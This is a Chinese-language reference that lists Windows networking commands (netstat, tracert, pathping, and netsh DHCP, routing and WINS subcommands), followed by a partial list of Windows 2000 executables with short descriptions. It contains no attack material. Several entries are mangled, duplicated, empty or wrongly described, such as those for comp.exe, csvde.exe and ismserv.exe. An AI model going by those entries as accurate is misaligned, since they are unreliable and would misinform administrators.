使用 netstat 顯示連接統(tǒng)計(jì)
可 以使用 netstat 命令顯示協(xié)議統(tǒng)計(jì)信息和當(dāng)前的 TCP/IP 連接。netstat -a 命令將顯示所有連接，而 netstat -r 顯示路由表和活動(dòng)連接。netstat -e 命令將顯示 Ethernet 統(tǒng)計(jì)信息，而 netstat -s 顯示每個(gè)協(xié)議的統(tǒng)計(jì)信息。如果使用 netstat -n，則不能將地址和端口號(hào)轉(zhuǎn)換成名稱。
Tracert（跟蹤路由）是路由跟蹤實(shí)用程序，用于確定 IP 數(shù)據(jù)報(bào)訪問目標(biāo)所采取的路徑。Tracert 命令用 IP 生存時(shí)間 (TTL) 字段和 ICMP 錯(cuò)誤消息來確定從一個(gè)主機(jī)到網(wǎng)絡(luò)上其他主機(jī)的路由。
-d 指定不將IP 地址解析到主機(jī)名稱。
-h maximum_hops 指定躍點(diǎn)數(shù)以跟蹤到稱為 target_name 的主機(jī)的路由。
-j host-list 指定 Tracert 實(shí)用程序數(shù)據(jù)包所采用路徑中的路由器接口列表。
-w timeout 等待 timeout 為每次回復(fù)所指定的毫秒數(shù)。
target_name 目標(biāo)主機(jī)的名稱或 IP 地址。
pathping 命令是一個(gè)路由跟蹤工具，它將 ping 和 tracert 命令的功能和這兩個(gè)工具所不提供的其他信息結(jié)合起來。pathping 命令在一段時(shí)間內(nèi)將數(shù)據(jù)包發(fā)送到到達(dá)最終目標(biāo)的路徑上的每個(gè)路由器，然后基于數(shù)據(jù)包的計(jì)算機(jī)結(jié)果從每個(gè)躍點(diǎn)返回。由于命令顯示數(shù)據(jù)包在任何給定路由器或鏈接上丟失的程度，因此可以很容易地確定可能導(dǎo)致網(wǎng)絡(luò)問題的路由器或鏈接。
-n Hostnames 不將地址解析成主機(jī)名。
-h Maximum hops 搜索目標(biāo)的最大躍點(diǎn)數(shù)。
-g Host-list 沿著路由列表釋放源路由。
-p Period 在 ping 之間等待的毫秒數(shù)。
-q Num_queries 每個(gè)躍點(diǎn)的查詢數(shù)。
-w Time-out 為每次回復(fù)所等待的毫秒數(shù)。
-T Layer 2 tag 將第 2 層優(yōu)先級(jí)標(biāo)記（例如，對(duì)于 IEEE 802.1p）連接到數(shù)據(jù)包并將它發(fā)送到路徑中的每個(gè)網(wǎng)絡(luò)設(shè)備。這有助于標(biāo)識(shí)沒有正確配置第 2 層優(yōu)先級(jí)的網(wǎng)絡(luò)設(shè)備。-T 開關(guān)用于測(cè)試服務(wù)質(zhì)量 (QoS) 連通性。
-R RSVP test Che 檢查以確定路徑中的每個(gè)路由器是否支持"資源保留協(xié)議 (RSVP)"，此協(xié)議允許主機(jī)為數(shù)據(jù)流保留一定量的帶寬。 -R 開關(guān)用于測(cè)試服務(wù)質(zhì)量 (QoS) 連通性。
在命令提示符下交互使用 DHCP 命令
打開 命令提示符。
鍵入 netsh。
在 netsh>(Netshell) 命令提示行鍵入"dhcp"。
在 dhcp>（DHCP 輔助程序）命令提示行，為您要管理的服務(wù)器鍵入 server \\servername 或 server ip_address。
一旦您有權(quán)管理的服務(wù)器已成功連接，則會(huì)看到"您可以對(duì)服務(wù)器 servername 進(jìn)行讀寫訪問"
一旦連接成功，您就可以使用用于 DHCP 的任何支持的 Netshell 命令。 鍵入 /? 或 help 來顯示直接的 DHCP 子命令菜單或作為選項(xiàng)顯示，鍵入 list 列出可與 DHCP 一起使用的所有 Netshell 子命令。
route 的命令
routing ip add/delete/set/show interface 在指定接口上添加、刪除、配置或顯示常規(guī) IP 路由設(shè)置。
routing ip add/delete/set/show filter 在指定接口上添加、刪除、配置或顯示 IP 數(shù)據(jù)包篩選器。
routing ip add/delete/show boundary 在指定接口上添加、刪除或顯示多播邊界設(shè)置。
routing ip add/set ipiptunnel 添加或配置 IP 中的 IP 接口。
routing ip add/delete/set/show rtmroute 添加、配置或顯示不持續(xù)的路由表管理器路由。
routing ip add/delete/set/show persistentroute 添加、刪除、配置或顯示持續(xù)路由。
routing ip add/delete/set/show preferenceforprotocol 添加、刪除、配置或顯示路由協(xié)議的優(yōu)先級(jí)。
routing ip add/delete/set/show scope 添加、刪除或顯示多播作用域。
routing ip set/show loglevel 配置或顯示全局 IP 記錄等級(jí)。
routing ip show helper 顯示 IP 的所有 Netsh 實(shí)用程序子環(huán)境。
routing ip show protocol 顯示所有正在運(yùn)行的 IP 路由協(xié)議。
routing ip show mfe 顯示多播轉(zhuǎn)發(fā)項(xiàng)。
routing ip show mfestats 顯示多播轉(zhuǎn)發(fā)項(xiàng)統(tǒng)計(jì)。
routing ip show boundarystats 顯示 IP 多播邊界。
routing ip show r***estinations 顯示路由表管理器路由表中的目標(biāo)。
routing ip show rtmroutes 顯示路由表管理器路由表中的路由。
routing ip nat set/show global 配置或顯示全局網(wǎng)絡(luò)地址轉(zhuǎn)換 (NAT) 設(shè)置。
routing ip nat add/delete/set/show interface 添加、刪除、配置或顯示指定接口的 NAT 設(shè)置。
routing ip nat add/delete addressrange 在 NAT 接口公用地址池中添加或刪除一個(gè)地址范圍。
routing ip nat add/delete addressmapping 添加或刪除 NAT 地址映射。
routing ip nat add/delete portmapping 添加或刪除 NAT 端口映射。
routing ip autodhcp set/show global 配置或顯示全局 DHCP 分配器參數(shù)。
routing ip autodhcp set/show interface 配置或顯示指定接口的 DHCP 分配器設(shè)置。
routing ip autodhcp add/delete exclusion 在 DHCP 分配器地址范圍中添加或刪除一個(gè)排除范圍。
routing ip dnsproxy set/show global 配置或顯示全局 DNS 代理參數(shù)。
routing ip dnsproxy set/show interface 配置或顯示指定接口的 DNS 代理參數(shù)。
routing ip igmp set/show global 配置或顯示 IGMP 全局設(shè)置。
routing ip igmp add/delete/set/show interface 在指定接口上添加、刪除、配置或顯示 IGMP。
routing ip igmp add/delete staticgroup 添加或刪除指定接口的靜態(tài)多播組。
routing ip igmp show grouptable 顯示 IGMP 主機(jī)組表。
routing ip igmp show ifstats 顯示每個(gè)接口的 IGMP 統(tǒng)計(jì)。
routing ip igmp show iftable 顯示每個(gè)接口的 IGMP 主機(jī)組。
routing ip igmp show proxygrouptable 顯示 IGMP 代理接口的 IGMP 組表。
routing ip igmp show rasgrouptable 顯示遠(yuǎn)程訪問服務(wù)器所使用的 Internet 接口的組表。
routing ip ospf set/show global 配置或顯示全局 OSPF 設(shè)置。
routing ip ospf add/delete/set/show interface 在指定接口上添加、刪除、配置或顯示 OSPF。
routing ip ospf add/delete/set/show area 添加、刪除、配置或顯示 OSPF 區(qū)域。
routing ip ospf add/delete/show range 在指定的 OSPF 區(qū)域上添加、刪除、配置或顯示范圍。
routing ip ospf add/delete/set/show virtif 添加、刪除、配置或顯示 OSPF 虛擬接口。
routing ip ospf add/delete/show neighbor 添加、刪除、配置或顯示 OSPF 鄰居。
routing ip ospf add/delete/show protofilter 添加、刪除、配置或顯示 OSPF 外部路由的路由信息源。
routing ip ospf add/delete/show routefilter 添加、刪除、配置或顯示 OSPF 外部路由的路由篩選。
routing ip ospf show areastats 顯示 OSPF 區(qū)域統(tǒng)計(jì)。
routing ip ospf show lsdb 顯示 OSPF 鏈接狀態(tài)數(shù)據(jù)庫。
routing ip ospf show virtifstats 顯示 OSPF 虛擬鏈接統(tǒng)計(jì)。
routing ip relay set global 配置"DHCP 中繼代理程序"的全局設(shè)置。
routing ip relay add/delete/set interface 在指定接口上添加、刪除或配置"DHCP 中繼代理程序"設(shè)置。
routing ip relay add/delete dhcpserver 在 DHCP 服務(wù)器地址列表中添加或刪除 DHCP 服務(wù)器的 IP 地址。
routing ip relay show ifbinding 顯示接口的 IP 地址綁定。
routing ip relay show ifconfig 顯示每個(gè)接口的"DHCP 中繼代理程序"配置。
routing ip relay show ifstats 顯示每個(gè)接口的 DHCP 統(tǒng)計(jì)。
routing ip rip set/show global 配置 IP 的 RIP 全局設(shè)置。
routing ip rip add/delete/set/show interface 在指定接口上添加或配置 IP 的 RIP 設(shè)置。
routing ip rip add/delete peerfilter 添加或刪除 RIP 對(duì)等篩選器。
routing ip rip add/delete acceptfilter 在接受的路由列表中添加或刪除 RIP 路由篩選器。
routing ip rip add/delete announcefilter 在公布的路由列表中添加或刪除 RIP 路由篩選器。
routing ip rip add/delete/show neighbor 添加或刪除 RIP 鄰居。
routing ip rip set/show flags 在指定接口上配置 IP RIP 高級(jí)設(shè)置。
routing ip rip show globalstats 顯示全局 RIP 參數(shù)。
routing ip rip show ifbinding 顯示接口的 IP 地址綁定。
routing ip rip show ifstats 顯示每個(gè)接口的 RIP 統(tǒng)計(jì)。
IPX netsh 路由命令
routing ipx add/set staticroute 在 IPX 路由表中添加或配置靜態(tài) IPX 路由。
routing ipx add/set staticservice 在 SAP 服務(wù)表中添加或配置靜態(tài) SAP 服務(wù)。
routing ipx add/set filter 在指定的接口上添加或配置 IPX 數(shù)據(jù)包篩選器。
routing ipx add/set interface 在請(qǐng)求撥號(hào)接口上啟用 IPX 路由，或在指定的接口上配置 IPX 設(shè)置。
routing ipx set global 配置全局 IPX 路由設(shè)置。
routing ipx rip add/set filter 添加和配置 RIP 路由篩選器。
routing ipx rip set global 配置全局 IPX 的 RIP 設(shè)置。
routing ipx rip set interface 在指定接口上配置 IPX 的 RIP 設(shè)置。
routing ipx sap add/set filter 添加或配置 SAP 服務(wù)篩選器。
routing ipx sap set global 配置全局 IPX 的 SAP 設(shè)置。
routing ipx sap set interface 在指定接口上配置 IPX 的 SAP 設(shè)置。
routing ipx netbios add nbname 將靜態(tài) NETBIOS 名稱添加到 IPX NetBIOS 名稱表中。
routing ipx netbios set interface 在指定接口上配置基于 IPX 的 NetBIOS 設(shè)置。
WINS NetSh 命令
list 列出所有可用的 WINS 命令。
dump 將 WINS 服務(wù)器配置轉(zhuǎn)儲(chǔ)到命令輸出。
add name 在服務(wù)器上注冊(cè)名稱。詳細(xì)信息，請(qǐng)輸入 add name /?
add partner 向服務(wù)器添加復(fù)制伙伴。詳細(xì)信息，請(qǐng)輸入 add partner /?
add pngserver 添加當(dāng)前服務(wù)器的 Persona Non Grata 服務(wù)器列表。詳細(xì)信息，請(qǐng)輸入 add pngserver /?
check database 檢查數(shù)據(jù)庫的一致性。詳細(xì)信息，請(qǐng)輸入 check database /?
check name 檢查一組 WINS 服務(wù)器的名稱記錄列表。詳細(xì)信息，請(qǐng)輸入 check name /?
check version 檢查版本號(hào)的一致性。詳細(xì)信息，請(qǐng)輸入 check version /?
delete name 從服務(wù)器數(shù)據(jù)庫中刪除已注冊(cè)的名稱。詳細(xì)信息，請(qǐng)輸入 delete name /?
delete partner 從復(fù)制伙伴列表中刪除復(fù)制伙伴。詳細(xì)信息，請(qǐng)輸入 delete partner /?
delete records 從服務(wù)器刪除或邏輯刪除所有記錄或一組記錄。詳細(xì)信息，請(qǐng)輸入 delete records /?
delete owners 刪除所有者列表及其記錄。詳細(xì)信息，請(qǐng)輸入 delete owners /?
delete pngserver 從列表中刪除所有的或選定的 Persona Non Grata 服務(wù)器。詳細(xì)信息，請(qǐng)輸入 delete pngserver /?
init backup 備份 WINS 數(shù)據(jù)庫。詳細(xì)信息，請(qǐng)輸入 init backup /?
init import 從 Lmhosts 文件導(dǎo)入數(shù)據(jù)。詳細(xì)信息，請(qǐng)輸入 init import /?
init pull 啟動(dòng)"拉"觸發(fā)器，并發(fā)送給另一臺(tái) WINS 服務(wù)器。詳細(xì)信息，請(qǐng)輸入 init pull /?
init pullrange 開始另一臺(tái) WINS 服務(wù)器的一組記錄，并讀取該記錄。詳細(xì)信息，請(qǐng)輸入 init pullrange /?
init push 啟動(dòng)"推"觸發(fā)器，并發(fā)送給另一臺(tái) WINS 服務(wù)器。詳細(xì)信息，請(qǐng)輸入 init push /?
init replicate 用復(fù)制伙伴復(fù)制數(shù)據(jù)庫。詳細(xì)信息，請(qǐng)輸入 init replicate /?
init restore 從文件還原數(shù)據(jù)庫。詳細(xì)信息，請(qǐng)輸入 init restore /?
init scavenge 清除服務(wù)器的 WINS 數(shù)據(jù)庫。詳細(xì)信息，請(qǐng)輸入 init scavenge /?
init search 搜索服務(wù)器的 WINS 數(shù)據(jù)庫。詳細(xì)信息，請(qǐng)輸入 init search /?
reset statistics 重置服務(wù)器的統(tǒng)計(jì)信息。詳細(xì)信息，請(qǐng)輸入 reset statistics /?
set autopartnerconfig 設(shè)置服務(wù)器的自動(dòng)復(fù)制伙伴配置信息。詳細(xì)信息，請(qǐng)輸入 set autopartnerconfig /?
set backuppath 設(shè)置服務(wù)器的備份參數(shù)。詳細(xì)信息，請(qǐng)輸入 set backuppath /?
set burstparam 設(shè)置服務(wù)器的突發(fā)處理參數(shù)。詳細(xì)信息，請(qǐng)輸入 set autopartnerconfig /?
set logparam 設(shè)置數(shù)據(jù)庫和事件日志記錄選項(xiàng)。詳細(xì)信息，請(qǐng)輸入 set logparam /?
set migrateflag 設(shè)置服務(wù)器的遷移標(biāo)志。詳細(xì)信息，請(qǐng)輸入 set migrateflag /?
set namerecord 設(shè)置服務(wù)器的間隔和超時(shí)值。詳細(xì)信息，請(qǐng)輸入 set namerecord /?
set periodicdbchecking 設(shè)置服務(wù)器的定期數(shù)據(jù)庫檢查參數(shù)。詳細(xì)信息，請(qǐng)輸入 set periodicdbchecking /?
set pullpartnerconfig 設(shè)置指定的"拉"伙伴的配置參數(shù)。詳細(xì)信息，請(qǐng)輸入 set pullpartnerconfig /?
set pushpartnerconfig 設(shè)置指定的"推"伙伴的配置參數(shù)。詳細(xì)信息，請(qǐng)輸入 set pushpartnerconfig /?
set pullparam 設(shè)置服務(wù)器的默認(rèn)"拉"參數(shù)。詳細(xì)信息，請(qǐng)輸入 set pullparam /?
set pushparam 設(shè)置服務(wù)器的默認(rèn)"推"參數(shù)。詳細(xì)信息，請(qǐng)輸入 set pushparam /?
set replicateflag 設(shè)置服務(wù)器的復(fù)制標(biāo)志。詳細(xì)信息，請(qǐng)輸入 set replicateflag /?
set startversion 設(shè)置數(shù)據(jù)庫的開始版本 ID。詳細(xì)信息，請(qǐng)輸入 set startversion /?
show browser 顯示所有活動(dòng)域主瀏覽器的 [1Bh] 記錄。詳細(xì)信息，請(qǐng)輸入 show browser /?
show database 顯示指定服務(wù)器的數(shù)據(jù)庫和記錄。詳細(xì)信息，請(qǐng)輸入 show database /?
show info 顯示配置信息。詳細(xì)信息，請(qǐng)輸入 show info /?
show name 顯示服務(wù)器中特定記錄的詳細(xì)信息。詳細(xì)信息，請(qǐng)輸入 show name /?
show partner 顯示服務(wù)器的"拉"或"推"（或"推拉"）伙伴。詳細(xì)信息，請(qǐng)輸入 show partner /?
show partnerproperties 顯示默認(rèn)伙伴配置。詳細(xì)信息，請(qǐng)輸入 show partnerproperties /?
show pullpartnerconfig 顯示"拉"伙伴的配置信息。詳細(xì)信息，請(qǐng)輸入 show pullpartnerconfig /?
show pushpartnerconfig 顯示"推"伙伴的配置信息。詳細(xì)信息，請(qǐng)輸入 show pushpartnerconfig /?
show reccount 顯示指定服務(wù)器所擁有的記錄數(shù)量。詳細(xì)信息，請(qǐng)輸入 show reccount /?
show recbyversion 顯示指定服務(wù)器所擁有的記錄。詳細(xì)信息，請(qǐng)輸入 show recbyversion /?
show server 顯示當(dāng)前選定的服務(wù)器。詳細(xì)信息，請(qǐng)輸入 show server /?
show statistics 顯示 WINS 服務(wù)器的統(tǒng)計(jì)信息。詳細(xì)信息，請(qǐng)輸入 show statistics /?
show version 顯示 WINS 服務(wù)器的當(dāng)前版本計(jì)數(shù)器值。詳細(xì)信息，請(qǐng)輸入 show version /?
show versionmap 顯示所有者 ID 到"最大版本數(shù)"的映射。詳細(xì)信息，請(qǐng)輸入 show versionmap /?
Interface 命令
interface set/show interface 啟用、禁用、連接、斷開連接以及顯示請(qǐng)求撥號(hào)接口的配置。
interface set/show credentials 在請(qǐng)求撥號(hào)接口上配置或顯示用戶名、密碼和域名。

?

Win2000命令全集

?

accwiz.exe > Accessibility Wizard for walking you through setting up your machine for your mobility needs. 輔助工具向?qū)?

?

acsetups.exe > ACS setup DCOM server executable

?

actmovie.exe > Direct Show setup tool 直接顯示安裝工具

?

append.exe > Allows programs to open data in specified directories as if they were in the current directory. 允許程序打開制定目錄中的數(shù)據(jù)

?

arp.exe > NETWORK Display and modify IP - Hardware addresses 顯示和更改計(jì)算機(jī)的IP與硬件物理地址的對(duì)應(yīng)列表

?

at.exe > AT is a scheduling utility also included with UNIX 計(jì)劃運(yùn)行任務(wù)

?

atmadm.exe > Displays statistics for ATM call manager. ATM調(diào)用管理器統(tǒng)計(jì)

?

attrib.exe > Display and modify attributes for files and folders 顯示和更改文件和文件夾屬性

?

autochk.exe > Used to check and repair Windows File Systems 檢測(cè)修復(fù)文件系統(tǒng)

?

autoconv.exe > Automates the file system conversion during reboots 在啟動(dòng)過程中自動(dòng)轉(zhuǎn)化系統(tǒng)

?

autofmt.exe > Automates the file format process during reboots 在啟動(dòng)過程中格式化進(jìn)程

?

autolfn.exe > Used for formatting long file names 使用長文件名格式

?

bootok.exe > Boot acceptance application for registry bootvrfy.exe > Bootvrfy.exe, a program included in Windows 2000 that notifies the system that startup was successful. Bootvrfy.exe can be run on a local or remote computer. 通報(bào)啟動(dòng)成功
cacls.exe > Displays or modifies access control lists (ACLs) of files. 顯示和編輯ACL

?

calc.exe > Windows Calculators 計(jì)算器

?

cdplayer.exe > Windows CD Player CD播放器

?

change.exe > Change { User | Port | Logon } 與終端服務(wù)器相關(guān)的查詢

?

charmap.exe > Character Map 字符映射表

?

chglogon.exe > Same as using "Change Logon" 啟動(dòng)或停用會(huì)話記錄

?

chgport.exe > Same as using "Change Port" 改變端口（終端服務(wù)）

?

chgusr.exe > Same as using "Change User" 改變用戶（終端服務(wù)）

?

chkdsk.exe > Check the hard disk for errors similar to Scandisk 3 Stages must specify a Drive Letter 磁盤檢測(cè)程序

?

chkntfs.exe > Same as using chkdsk but for NTFS NTFS磁盤檢測(cè)程序

?

cidaemon.exe > Component of Ci Filer Service 組成Ci文檔服務(wù)

?

cipher.exe > Displays or alters the encryption of directories [files] on NTFS partitions. 在NTFS上顯示或改變加密的文件或目錄

?

cisvc.exe > Content Index -- It's the content indexing service for I 索引內(nèi)容

?

ckcnv.exe > Cookie Convertor 變換Cookie

?

cleanmgr.exe > Disk Cleanup, popular with Windows 98 磁盤清理

?

cliconfg.exe > SQL Server Client Network Utility SQL客戶網(wǎng)絡(luò)工具 clipbrd.exe > Clipboard viewer for Local will allow you to connect to other clipboards 剪貼簿查看

?

clipsrv.exe > Start the clipboard Server 運(yùn)行Clipboard服務(wù)

?

clspack.exe > CLSPACK used to create a file listing of system packages 建立系統(tǒng)文件列表清

?

cluster.exe > Display a cluster in a domain 顯示域的集群

?

_cmd_.exe > Famous command prompt 沒什么好說的！

?

cmdl32.exe > Connection Manager Auto-Download 自動(dòng)下載連接管理

?

cmmgr32.exe > Connection Manager 連接管理器

?

cmmon32.exe > Connection Manager Monitor 連接管理器監(jiān)視

?

cmstp.exe > Connection Manager Profile Manager 連接管理器配置文件安裝程序

?

comclust.exe > about cluster server 集群

?

comp.exe > ComClust Add, Remove, or Join a cluster. 比較兩個(gè)文件和文件集的內(nèi)容＊

?

compact.exe > Displays or alters the compression of files on NTFS partitions. 顯示或改變NTFS分區(qū)上文件的壓縮狀態(tài)

?

conime.exe > Console IME IME控制臺(tái)

?

control.exe > Starts the control panel 控制面板

?

convert.exe > Convert File System to NTFS 轉(zhuǎn)換文件系統(tǒng)到NTFS

?

convlog.exe > Converts MS IIS log files 轉(zhuǎn)換IIS日志文件格式到NCSA格式

?

cprofile.exe > Copy profiles 轉(zhuǎn)換顯示模式

?

cscript.exe > MS Windows Scripts Host Version 5.1 較本宿主版本

?

csrss.exe > Client Server Runtime Process 客戶服務(wù)器Runtime進(jìn)程

?

csvde.exe > Comma Separated Variable Import/Export Utility 日至格式轉(zhuǎn)換程序

?

dbgtrace.exe > 和Terminal Server相關(guān)

?

dcomcnfg.exe > Display the current DCOM configuration. DCOM配置屬性

?

dcphelp.exe > ?

?

dcpromo.exe > Promote a domain controller to ADSI AD安裝向?qū)?

?

ddeshare.exe > Display DDE shares on local or remote computer DDE共享

?

ddmprxy.exe >

?

debug.exe > Runs Debug, a program testing and editing tool. 就是DEBUG啦！

?

dfrgfat.exe > Defrag FAT file system FAT分區(qū)磁盤碎片整理程序

?

dfrgntfs.exe > Defrag NTFS file system NTFS分區(qū)磁盤碎片整理程序

?

dfs_cmd_.exe > configures a Dfs tree 配置一個(gè)DFS樹

?

dfsinit.exe > Distributed File System Initialization 分布式文件系統(tǒng)初始化

?

dfssvc.exe > Distributed File System Server 分布式文件系統(tǒng)服務(wù)器

?

diantz.exe > MS Cabinet Maker 制作CAB文件

?

diskperf.exe > Starts physical Disk Performance counters 磁盤性能計(jì)數(shù)器

?

dllhost.exe > dllhost is used on all versions of Windows 2000. dllhost is the hedost process for all COM+ applications. 所有COM+應(yīng)用軟件的主進(jìn)程

?

dllhst3g.exe >
網(wǎng)絡(luò)常用命令:

?

dmadmin.exe > Disk Manager Service 磁盤管理服務(wù)

?

dmremote.exe > Part of disk management 磁盤管理服務(wù)的一部分

?

dns.exe > DNS Applications DNS

?

doskey.exe > recalls Windows command lines and creates macros 命令行創(chuàng)建宏

?

dosx.exe > DOS Extender DOS擴(kuò)展

?

dplaysvr.exe > Direct Play Helper 直接運(yùn)行幫助

?

drwatson.exe > Dr Watson for 2000 Fault Detector 華生醫(yī)生錯(cuò)誤檢測(cè)

?

drwtsn32.exe > Dr Watson for 2000 viewer and configuration manager 華生醫(yī)生顯示和配置管理

?

dtcsetup.exe > Installs MDTC

?

dvdplay.exe > Windows 2000 DVD player DVD播放

?

dxdiag.exe > Direct-X Diagnostics Direct-X診斷工具

?

edlin.exe > line-oriented text editor. 命令行的文本編輯器（歷史悠久啊！）
edlin.exe > line-oriented text editor. 命令行的文本編輯器（歷史悠久啊！）

?

esentutl.exe > MS Database Utility MS數(shù)據(jù)庫工具

?

eudcedit.exe > Private character editor Ture Type造字程序

?

eventvwr.exe > Windows 2000 Event Viewer 事件查看器

?

evnt_cmd_.exe > Event to trap translator; Configuration tool

?

evntwin.exe > Event to trap translator setup

?

exe2bin.exe > Converts EXE to binary format 轉(zhuǎn)換EXE文件到二進(jìn)制

?

expand.exe > Expand Files that have been compressed 解壓縮

?

extrac32.exe > CAB File extraction utility 解CAB工具

?

fastopen.exe > Fastopen tracks the location of files on a hard disk and stores the information in memory for fast access. 快速訪問在內(nèi)存中的硬盤文件

?

faxcover.exe > Fax Cover page editor 傳真封面編輯

?

faxqueue.exe > Display Fax Queue 顯示傳真隊(duì)列

?

faxsend.exe > Fax Wizard for sending faxes 發(fā)送傳真向?qū)?

?

faxsvc.exe > Starts fax server 啟動(dòng)傳真服務(wù)

?

fc.exe > Compares two files or sets of files and their differences 比較兩個(gè)文件的不同

?

find.exe > Searches for a text string in file or files 查找文件中的文本行

?

findstr.exe > Searches for strings in files 查找文件中的行

?

finger.exe > Fingers a user and displays statistics on that user Finger一個(gè)用戶并顯示出統(tǒng)計(jì)結(jié)果

?

fixmapi.exe > Fix mapi files 修復(fù)MAPI文件

?

flattemp.exe > Enable or disable temporally directories 允許或者禁用臨時(shí)文件目錄

?

fontview.exe > Display fonts in a font file 顯示字體文件中的字體

?

forcedos.exe > Forces a file to start in dos mode. 強(qiáng)制文件在DOS模式下運(yùn)行

?

freecell.exe > Popular Windows Game 空當(dāng)接龍

?

ftp.exe > File Transfer Protocol used to transfer files over a network connection 就是FTP了

?

gdi.exe > Graphic Device Interface 圖形界面驅(qū)動(dòng)

?

grovel.exe >

?

grpconv.exe > Program Manager Group Convertor 轉(zhuǎn)換程序管理員組

?

help.exe > displays help for Windows 2000 commands 顯示幫助

?

hostname.exe > Display hostname for machine. 顯示機(jī)器的Hostname

?

ie4uinit.exe > IE5 User Install tool IE5用戶安裝工具

?

ieshwiz.exe > Customize folder wizard 自定義文件夾向?qū)?

?

iexpress.exe > Create and setup packages for install 穿件安裝包

?

iisreset.exe > Restart IIS Admin Service 重啟IIS服務(wù)

?

internat.exe > Keyboard Language Indicator Applet 鍵盤語言指示器

?

ipconfig.exe > Windows 2000 IP configuration. 察看IP配置

?

ipsecmon.exe > IP Security Monitor IP安全監(jiān)視器

?

ipxroute.exe > IPX Routing and Source Routing Control Program IPX路由和源路由控制程序

?

irftp.exe > Setup FTP for wireless communication 無線連接

?

ismserv.exe > Intersite messaging Service 安裝或者刪除Service Control Manager中的服務(wù)

?

jdbgmgr.exe > Microsoft debugger for java 4 Java4的調(diào)試器

?

jetconv.exe > Convert a Jet Engine Database 轉(zhuǎn)換Jet Engine數(shù)據(jù)庫

?

jetpack.exe > Compact Jet Database. 壓縮Jet數(shù)據(jù)庫

?

jview.exe > Command-line loader for Java Java的命令行裝載者

?

krnl386.exe > Core Component for Windows 2000 2000的核心組件

?

label.exe > Change label for drives 改變驅(qū)動(dòng)器的卷標(biāo)

?

lcwiz.exe > License Compliance Wizard for local or remote systems. 許可證符合向?qū)?

?

ldifde.exe > LDIF cmd line manager LDIF目錄交換命令行管理

?

licmgr.exe > Terminal Server License Manager 終端服務(wù)許可協(xié)議管理

?

lights.exe > display connection status lights 顯示連接狀況

?

llsmgr.exe > Windows 2000 License Manager 2000許可協(xié)議管理

?

llssrv.exe > Start the license Server 啟動(dòng)許可協(xié)議服務(wù)器

?

lnkstub.exe >

?

locator.exe > RPC Locator 遠(yuǎn)程定位

?

lodctr.exe > Load perfmon counters 調(diào)用性能計(jì)數(shù)

?

logoff.exe > Log current user off. 注銷用戶

?

lpq.exe > Displays status of a remote LPD queue 顯示遠(yuǎn)端的LPD打印隊(duì)列的狀態(tài)，顯示被送到基于Unix的服務(wù)器的打印任務(wù)

?

lpr.exe > Send a print job to a network printer. 重定向打印任務(wù)到網(wǎng)絡(luò)中的打印機(jī)。通常用于Unix客戶打印機(jī)將打印任務(wù)發(fā)送給連接了打印設(shè)備的NT的打印機(jī)服務(wù)器。

?

lsass.exe > LSA Executable and Server DLL 運(yùn)行LSA和Server的DLL

?

lserver.exe > Specifies the new DNS domain for the default server 指定默認(rèn)Server新的DNS域

?

macfile.exe > Used for managing MACFILES 管理MACFILES

?

magnify.exe > Used to magnify the current screen 放大鏡

?

makecab.exe > MS Cabinet Maker 制作CAB文件

?

mdm.exe > Machine Debug Manager 機(jī)器調(diào)試管理

?

mem.exe > Display current Memory stats 顯示內(nèi)存狀態(tài)

?

migpwd.exe > Migrate passwords. 遷移密碼

?

mmc.exe > Microsoft Management Console 控制臺(tái)

?

mnmsrvc.exe > Netmeeting Remote Desktop Sharing NetMeeting遠(yuǎn)程桌面共享

?

mobsync.exe > Manage Synchronization. 同步目錄管理器

?

mountvol.exe > Creates, deletes, or lists a volume mount point. 創(chuàng)建、刪除或列出卷的裝入點(diǎn)。

?

mplay32.exe > MS Media Player 媒體播放器

?

mpnotify.exe > Multiple Provider Notification application 多提供者通知應(yīng)用程序

?

mq1sync.exe >

?

mqbkup.exe > MS Message Queue Backup and Restore Utility 信息隊(duì)列備份和恢復(fù)工具

?

mqexchng.exe > MSMQ Exchange Connector Setup 信息隊(duì)列交換連接設(shè)置

?

mqmig.exe > MSMQ Migration Utility 信息隊(duì)列遷移工具

?

mqsvc.exe > ?

?

mrinfo.exe > Multicast routing using SNMP 使用SNMP多點(diǎn)傳送路由

?

mscdexnt.exe > Installs MSCD (MS CD Extensions) 安裝MSCD

?

msdtc.exe > Dynamic Transaction Controller Console 動(dòng)態(tài)事務(wù)處理控制臺(tái)

?

msg.exe > Send a message to a user local or remote. 發(fā)送消息到本地或遠(yuǎn)程客戶

?

mshta.exe > HTML Application HOST HTML應(yīng)用程序主機(jī)

?

msiexec.exe > Starts Windows Installer Program 開始Windows安裝程序

?

mspaint.exe > Microsoft Paint 畫板

?

msswchx.exe >

?

mstask.exe > Task Schedule Program 任務(wù)計(jì)劃表程序

?

mstinit.exe > Task scheduler setup 任務(wù)計(jì)劃表安裝

?

narrator.exe > Program will allow you to have a narrator for reading. Microsoft講述人

?

nbtstat.exe > Displays protocol stats and current TCP/IP connections using NBT 使用 NBT（TCP/IP 上的 NetBIOS）顯示協(xié)議統(tǒng)計(jì)和當(dāng)前 TCP/IP 連接。

?

nddeapir.exe > NDDE API Server side NDDE API服務(wù)器端

?

net.exe > Net Utility 詳細(xì)用法看/？

?

net1.exe > Net Utility updated version from MS Net的升級(jí)版

?

netdde.exe > Network DDE will install itself into the background 安裝自己到后臺(tái)

?

netsh.exe > Creates a shell for network information 用于配置和監(jiān)控 Windows 2000 命令行腳本接口。

?

netstat.exe > Displays current connections. 顯示協(xié)議統(tǒng)計(jì)和當(dāng)前的 TCP/IP 網(wǎng)絡(luò)連接。

?

nlsfunc.exe > Loads country-specific information 加載特定國家（地區(qū)）的信息。Windows 2000 和 MS-DOS 子系統(tǒng)不使用該命令。接受該命令只是為了與 MS-DOS 文件兼容。

?

notepad.exe > Opens Windows 2000 Notepad 記事本

?

nslookup.exe > Displays information for DNS 該診斷工具顯示來自域名系統(tǒng) (DNS) 名稱服務(wù)器的信息。

?

ntbackup.exe > Opens the NT Backup Utility 備份和故障修復(fù)工具

?

ntbooks.exe > Starts Windows Help Utility 幫助

?

ntdsutil.exe > Performs DB maintenance of the ADSI 完成ADSI的DB的維護(hù)

?

ntfrs.exe > NT File Replication Service NT文件復(fù)制服務(wù)

?

ntfrsupg.exe >

?

ntkrnlpa.exe > Kernel patch 核心補(bǔ)丁

?

ntoskrnl.exe > Core NT Kernel KT的核心

?

ntsd.exe >

?

ntvdm.exe > Simulates a 16-bit Windows environment 模擬16位Windows環(huán)境

?

nw16.exe > Netware Redirector NetWare轉(zhuǎn)向器

?

nwscript.exe > runs netware scripts 運(yùn)行Netware腳本

?

